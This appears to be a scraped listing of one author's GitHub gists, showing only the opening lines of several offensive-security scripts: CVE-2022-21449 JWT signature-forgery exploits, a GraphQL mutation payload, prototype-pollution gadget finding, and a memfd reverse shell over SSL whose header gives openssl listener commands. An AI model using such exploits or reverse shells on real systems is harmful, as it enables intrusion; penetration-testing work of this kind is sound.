This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
# gql_mutation_payload.py | |
# @dualfade | |
# NOTE: refs -- | |
# https://dev.to/ivandotv/preventing-graphql-batching-attacks-56o3 | |
# https://cheatsheetseries.owasp.org/cheatsheets/GraphQL_Cheat_Sheet.html#mutation-access-data-manipulation | |
# https://devinschulz.com/rename-fields-by-using-aliases-in-graphql/ | |
""" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
# cve-2022-21449.py | |
# dualfade -- | |
# refs -- | |
# https://bit.ly/3aVqwsC -- | |
# https://bit.ly/3tw6z1P -- | |
# initial jwt -- | |
# ex: eyJhbGciOiJFUzI1NiJ9.eyJzdWIiOiJ0ZXN0QHBlbnRlc3RlcmxhYi5jb20ifQ. \ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env ruby | |
# cve-2022-21449 | |
# dualfade -- | |
# rewrite in ruby 3 -- | |
# imports -- | |
require 'bundler/inline' | |
require 'ecdsa/signature' | |
require 'ecdsa/format' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env ruby | |
# typed: false | |
# dualfade -- | |
# memfd_create_rssl.rb -- | |
# NOTE: from sorbet -- | |
# https://sorbet.org/docs/adopting -- | |
# gem 'sorbet-static-and-runtime' | |
# gem 'tapioca', require: false, :group => :development |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# shellcheck disable=SC2059 | |
# simulate_typing.sh | |
# #dualfade -- | |
# ref -- | |
# tldr xdotool; https://www.mankier.com/1/xdotool -- | |
# tldr xclip; https://linux.die.net/man/1/xclip -- | |
function vdi_clip2win() { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
gomuks v3.0.0 -- | |
https://github.com/tulir/gomuks | |
how to remove "Empty Room" in gomuks -- | |
Do the following -- | |
Ref: | |
https://github.com/tulir/gomuks/issues/192#issuecomment-760003730 | |
Log in to the chomium element web account |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// find javascript gadgets -- | |
// forked => https://gist.github.com/nikitastupin/b3b64a9f8c0eb74ce37626860193eaec | |
// ref => https://github.com/BlackFan/client-side-prototype-pollution | |
// ref => https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#prototype-pollution | |
// updated; @dualfade -- | |
// start -- | |
// check for known gadgets -- | |
(() => { | |
// gadgets -- |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function interceptNetworkRequests(ee) { | |
const open = XMLHttpRequest.prototype.open; | |
const send = XMLHttpRequest.prototype.send; | |
const isRegularXHR = open.toString().indexOf('native code') !== -1; | |
// don't hijack if already hijacked - this will mess up with frameworks like Angular with zones | |
// we work if we load first there which we can. | |
if (isRegularXHR) { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
{ | |
"proxy": { | |
"ssl_pass_through": { | |
"automatically_add_entries_on_client_ssl_negotiation_failure": false, | |
"rules": [ | |
{ | |
"enabled": true, | |
"host": ".*\\.google\\.com", | |
"protocol": "any" | |
}, |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
# memfd_rssl_shell.py | |
# dualfade | |
# memfd reverse shell over ssl -- | |
# inspired by; https://0x00sec.org/t/super-stealthy-droppers/3715 -- | |
# ex: server side -- | |
# openssl req -subj '/CN=yourcn.com/O=YourOrg/C=FR' -new -newkey rsa:4096 -days 3650 -nodes -x509 -keyout server.key -out server.pem | |
# openssl s_server -quiet -key server.key -cert server.pem -port 8443 |
NewerOlder